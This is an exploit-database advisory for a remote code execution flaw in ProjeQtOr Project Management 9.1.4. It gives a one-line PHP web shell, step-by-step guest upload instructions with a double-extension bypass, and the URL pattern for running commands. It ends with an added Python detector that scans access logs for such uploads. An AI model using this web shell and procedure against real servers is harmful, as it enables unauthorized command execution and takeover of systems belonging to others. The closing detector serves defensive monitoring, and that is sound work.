Exploits / Vulnerability Discovered : 2021-06-01
Type : webapps
Platform : php
This exploit / vulnerability (ProjeQtOr Project Management 9.1.4 remote code execution) is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
# Exploit Title: ProjeQtOr Project Management 9.1.4 - Remote Code Execution
# Date: 29.05.2021
# Exploit Author: Temel Demir
# Vendor Homepage: https://www.projeqtor.org
# Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV9.1.4.zip
# Version: v9.1.4
# Tested on: Laragon @WIN10
# Description: Remote code execution and privilege escalation as a guest user. An arbitrary file upload in the profile editing section allows a malicious file to be uploaded and run.
PoC process, step by step:
# 1) Create a file with the PHP code below and save it as demir.pHp
<?php echo shell_exec($_GET['key'].' 2>&1'); ?>
# 2) Log in to the ProjeQtOr portal as a guest user.
# 3) Click the -profile- button on the header panel.
# 4) Click the -add photo- button, choose the upload section and browse to your demir.pHp file.
# 5) Click OK. The script will report "Attachment #($number) inserted". The attachment number is needed for the file path. (demo: attachment number is "23" > file directory "/files/attach//attachment_23/" )
# 6) As a last step, append ".projeqtor" to the file extension.
You can call the uploaded file like this > http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor
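
Defensive counterpart to the steps above, as an added example that is not part of the original advisory or of ProjeQtOr's code: a Python check that flags requests under /files/attach/ for files whose name carries a script extension in any position, compared case-insensitively. The extension list, the log format and the sample log lines are assumptions constructed for illustration.

```python
import re

# Extensions a PHP-enabled server may pass to the interpreter (assumed list;
# align it with the handler configuration of the server being reviewed).
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}

# Request path under the attachment directory named in the PoC steps.
ATTACH_RE = re.compile(r"^/files/attach/+attachment_(\d+)/([^/?\s]+)(\?\S*)?$")
# Minimal common/combined log format: request target and status code.
LOG_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')


def risky_name(filename):
    """True if ANY dot-separated component after the first is a script
    extension, compared case-insensitively (catches demir.pHp.projeqtor)."""
    parts = filename.lower().split(".")[1:]
    return any(p in SCRIPT_EXTS for p in parts)


def scan_log(lines):
    """Return (attachment_id, filename, has_query, status) for each request
    that fetches a risky-named file from the attachment directory."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        a = ATTACH_RE.match(m.group(1))
        if a and risky_name(a.group(2)):
            hits.append((int(a.group(1)), a.group(2),
                         bool(a.group(3)), int(m.group(2))))
    return hits


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jun/2021:10:00:01 +0000] "GET /files/attach/attachment_23/photo.png HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jun/2021:10:00:07 +0000] "GET /files/attach/attachment_23/demir.pHp.projeqtor?key=x HTTP/1.1" 200 64',
    '192.0.2.11 - - [01/Jun/2021:10:02:00 +0000] "GET /view/main.php HTTP/1.1" 200 900',
    '192.0.2.12 - - [01/Jun/2021:10:03:00 +0000] "GET /files/attach//attachment_4/report.PHTML HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The same risky_name test can be applied to a directory listing of the attachment store to find files already uploaded; a hit with a query string and a 200 status deserves the first look.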